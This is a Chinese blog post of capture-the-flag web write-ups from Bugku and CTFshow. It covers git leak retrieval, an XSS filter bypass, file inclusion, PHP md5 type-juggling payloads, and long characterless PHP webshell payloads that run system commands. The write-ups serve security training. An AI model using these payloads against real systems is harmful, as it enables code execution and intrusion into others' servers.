<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.11.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="sourcegit reflog命令：显示可引用的历史版本记录kali检查git泄露: 1wget -r http:&#x2F;&#x2F;114.67.246.176:17920&#x2F;.git -r表示递归的意思，就是把这个目录所有的文件下载下来">
<meta property="og:type" content="article">
<meta property="og:title" content="”刷题记录4“">
<meta property="og:url" content="http://example.com/2023/09/09/%E2%80%9D%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954%E2%80%9C/index.html">
<meta property="og:site_name" content="临摹">
<meta property="og:description" content="sourcegit reflog命令：显示可引用的历史版本记录kali检查git泄露: 1wget -r http:&#x2F;&#x2F;114.67.246.176:17920&#x2F;.git -r表示递归的意思，就是把这个目录所有的文件下载下来">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/image/bugku/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954/1.png">
<meta property="og:image" content="http://example.com/image/bugku/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954/2.png">
<meta property="article:published_time" content="2023-09-09T15:32:44.000Z">
<meta property="article:modified_time" content="2023-09-09T16:06:09.206Z">
<meta property="article:author" content="Justin">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/image/bugku/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954/1.png">


<link rel="canonical" href="http://example.com/2023/09/09/%E2%80%9D%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954%E2%80%9C/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/09/09/%E2%80%9D%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954%E2%80%9C/","path":"2023/09/09/”刷题记录4“/","title":"”刷题记录4“"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>”刷题记录4“ | 临摹</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">临摹</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>







</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#source"><span class="nav-number">1.</span> <span class="nav-text">source</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%95%99%E8%A8%80%E6%9D%BF1"><span class="nav-number">2.</span> <span class="nav-text">留言板1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">3.</span> <span class="nav-text">文件包含</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%A4%87%E4%BB%BD%E6%98%AF%E4%B8%AA%E5%A5%BD%E4%B9%A0%E6%83%AF"><span class="nav-number">4.</span> <span class="nav-text">备份是个好习惯</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#No-one-knows-regex-better-than-me"><span class="nav-number">5.</span> <span class="nav-text">No one knows regex better than me</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CTFshow-RCE%E6%9E%81%E9%99%90%E5%A4%A7%E6%8C%91%E6%88%98"><span class="nav-number">6.</span> <span class="nav-text">CTFshow-RCE极限大挑战</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ezbypass"><span class="nav-number">7.</span> <span class="nav-text">ezbypass</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Justin</p>
  <div class="site-description" itemprop="description">适得浮生</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">39</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/09/09/%E2%80%9D%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954%E2%80%9C/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Justin">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="临摹">
      <meta itemprop="description" content="适得浮生">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="”刷题记录4“ | 临摹">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ”刷题记录4“
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-09-09 23:32:44" itemprop="dateCreated datePublished" datetime="2023-09-09T23:32:44+08:00">2023-09-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-09-10 00:06:09" itemprop="dateModified" datetime="2023-09-10T00:06:09+08:00">2023-09-10</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/bugku/" itemprop="url" rel="index"><span itemprop="name">bugku</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="source"><a href="#source" class="headerlink" title="source"></a>source</h1><p><code>git reflog</code>命令：显示可引用的历史版本记录<br>kali检查git泄露:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget -r http://114.67.246.176:17920/.git</span><br></pre></td></tr></table></figure>
<p>-r表示递归的意思，就是把这个目录所有的文件下载下来</p>
<span id="more"></span>
<h1 id="留言板1"><a href="#留言板1" class="headerlink" title="留言板1"></a>留言板1</h1><p>在<code>xss.pt</code>注册一个账号，<code>配置XSS</code><br>我们复制srcipt这一条去试<br>查看回显<br>我们会发现过滤了script和空格，进行其他代码尝试，会发现 ( ) 括号也进行了过滤<br>我们有<code>大小写+双写可以过滤srcipt</code>，<code>空格使用反斜杠</code>进行绕过</p>
<h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><p>构造payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=/flag</span><br></pre></td></tr></table></figure>
<p>路径前<code>加不加（/）的区别</code>:<br>1.（无）开头表示当前目录下的<br>2.（&#x2F;）开头的目录表示该目录为根目录的一个子目录<br>3.（.&#x2F;）开头的目录表示该目录为当前目录（当前目录所在的目录）的一个子目录<br>4.（..&#x2F;）开头的目录表示该目录为当前目录的父目录<br>对于HTML 页面，如果我们在其中有关于反斜杠应用的路径，我们可以分为下面两种情况：<br>如直接对该页面打开访问：则这里相对的是我们的盘符，如（&#x2F;res&#x2F;index.html），实际路径为(C:&#x2F;&#x2F;res&#x2F;index.html);<br>如我们在Tomcat中构建打开：则这里相对的是我们的站点，如(&#x2F;webTest&#x2F;html&#x2F;index.html)，实际路径为(<a target="_blank" rel="noopener" href="http://localhost:8080/webTest/html/index.html">http://localhost:8080/webTest/html/index.html</a>);</p>
<h1 id="备份是个好习惯"><a href="#备份是个好习惯" class="headerlink" title="备份是个好习惯"></a>备份是个好习惯</h1><p><code>ini_set</code> — 为一个配置选项设置值<br>如：<code>ini_set(&quot;display_errors&quot;, 0)</code>&#x2F;&#x2F;设置不返回错误信息<br>代码的意思是需要两个不同的key不同，但是两个key的md5的值是相同的且要绕过“key”的过滤<br>1.<code>使用kekeyy数组进行绕过</code>，md5函数无法处理数组，这样就会返回两个NULL，而两个NULL的md5值是一样的，但是传入的key值可以不同,构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?kekeyy1[]=aaa&amp;kekeyy2[]=bb</span><br></pre></td></tr></table></figure>
<p>2.<code>使用==这个的比较漏洞</code>，如果两个字符经过md5加密后的值是<code>0exxxxx</code>形式，在科学计数法中会被认为是0*10的几次方，<code>结果是0</code>。此时，md5加密值相等，但是key值是不等的，下面是md5加密后是0exxxxx形式的：<br>240610708<br>0e462097431906509019562988736854<br>QNKCDZO<br>0e830400451993494058024219903391<br>…<br>构造payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?kekeyy1=240610708&amp;kekeyy2=QNKCDZO</span><br></pre></td></tr></table></figure>
<h1 id="No-one-knows-regex-better-than-me"><a href="#No-one-knows-regex-better-than-me" class="headerlink" title="No one knows regex better than me"></a>No one knows regex better than me</h1><p><img src="/image/bugku/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954/1.png" alt="打开方式"><br>正则运算<br>第一个正则:<br>if(preg_match_all(“&#x2F;Yeedo|wants|a|girl|friend|or|a|flag&#x2F;i”,$second))、<br>传入的两个参数只要有这其中的字符就行了(一个就行)<br>第二个正则：<br>if(preg_match(“&#x2F;..|flag&#x2F;“,$key)){<br>        die(“Noooood hacker!”);<br>    }<br>不能匹配到..或flag<br>第三个正则:<br>if(preg_match(“&#x2F;\|\056\160\150\x70&#x2F;i”,$third))<br>这里注意的地方 形如\xnn为16进制(Hex)，\nnn为8进制，php中将自动识别<br>ascii码转换后为：\|.php<br>字符串传入到PHP的时候转义一次+正则转义一次，一共转义了两次。并且\比|优先进行计算。 于是最内层那个正则从 \|.php 变成 |.php 再 |.php ，综上first参数要&#x3D; [4个字符]|.php<br>而$zero为flag要base64加密为ZmxhZw&#x3D;&#x3D;</p>
<h1 id="CTFshow-RCE极限大挑战"><a href="#CTFshow-RCE极限大挑战" class="headerlink" title="CTFshow-RCE极限大挑战"></a>CTFshow-RCE极限大挑战</h1><p>这里想到知道p佬的payload，但是由于这里为php7，assert已经变成一个跟eval类似的语言结构了，所以assert已经不能当做函数使用了。<br>但是由于这里没有限制字符串长度，且php的函数是对字母大小写不敏感的，所以可以使用字符串自增的方式构造SYSTEM和_POST字符串</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$_=[].&#x27;&#x27;;  //得到Array</span><br><span class="line">$_=$_[&#x27;/&#x27;==&#x27;+&#x27;];   //让[]里的值报错返回0,取Array[0]=A，此时$_=A</span><br><span class="line">$____=&#x27;_&#x27;;   //让$____=_，后面容易拼接</span><br><span class="line">$__=$_;   //将A赋给$__</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;  //A自增到G，此时$__=G</span><br><span class="line">$____.=$__; //将_和G拼接起来，此时$____=_G</span><br><span class="line">$__=$_;   //再将$__还原成A</span><br><span class="line">$__++;$__++;$__++;$__++;  //A自增到E,此时__=E</span><br><span class="line">$____.=$__;  //E和_G拼接，此时$____为_GE</span><br><span class="line">$__=$_;  //再将__换源成A</span><br><span class="line">$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;  //A自增成T此时__=T</span><br><span class="line">$____.=$__;  //再拼接成_GET，此时$____=_GET</span><br><span class="line">$_=$____;   //为了方便起见，我们把____换成_</span><br><span class="line">($$_[_])($$_[__]);  //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可</span><br></pre></td></tr></table></figure>  
<p>最终得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$_=[].[];$_=$_[&#x27;!&#x27;==&#x27;$&#x27;];$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___=$__;$_____=$__;$_____++;$_____++;$_____++;$_____++;$_____++;$_____++;$___.=$_____;$___.=$__;$__++;$___.=$__;$_++;$_++;$_++;$_++;$___.=$_;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___.=$_;$____=&#x27;_&#x27;;$_=[].[];$_=$_[&#x27;!&#x27;==&#x27;$&#x27;];$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);</span><br></pre></td></tr></table></figure>
<p>在传参时要将+进行url编码，否则在传参时+会被解码为空格<br>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctf_show=$_=[].[];$_=$_[&#x27;!&#x27;==&#x27;$&#x27;];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$___=$__;$_____=$__;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$_____%2B%2B;$___.=$_____;$___.=$__;$__%2B%2B;$___.=$__;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$_%2B%2B;$___.=$_;$____=&#x27;_&#x27;;$_=[].[];$_=$_[&#x27;!&#x27;==&#x27;$&#x27;];$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$__=$_;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$__%2B%2B;$____.=$__;$_=$$____;$___($_[_]);&amp;_=tac /*</span><br></pre></td></tr></table></figure>
<h1 id="ezbypass"><a href="#ezbypass" class="headerlink" title="ezbypass"></a>ezbypass</h1><p><img src="/image/bugku/%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%954/2.png" alt="打开方式"><br>与上题同理，为无字符webshell<br>构建payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);&amp;_=system&amp;__=cat /flag</span><br></pre></td></tr></table></figure>
<p>NaN（Not a Number，非数）是计算机科学中数值数据类型的一类值，表示未定义或不可表示的值。<br>(<em>&#x2F;</em>.<em>)为NAN,故$</em>&#x3D;(<em>&#x2F;</em>.<em>)[</em>]&#x3D;N，payload构成</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$_POST SYSTEM($_POST CAT /FLAG)</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/09/09/%E2%80%9D%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%953%E2%80%9C/" rel="prev" title="”刷题记录3“">
                  <i class="fa fa-chevron-left"></i> ”刷题记录3“
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/02/12/%E8%83%8C%E5%8C%85%E9%97%AE%E9%A2%98/" rel="next" title="背包问题">
                  背包问题 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Justin</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
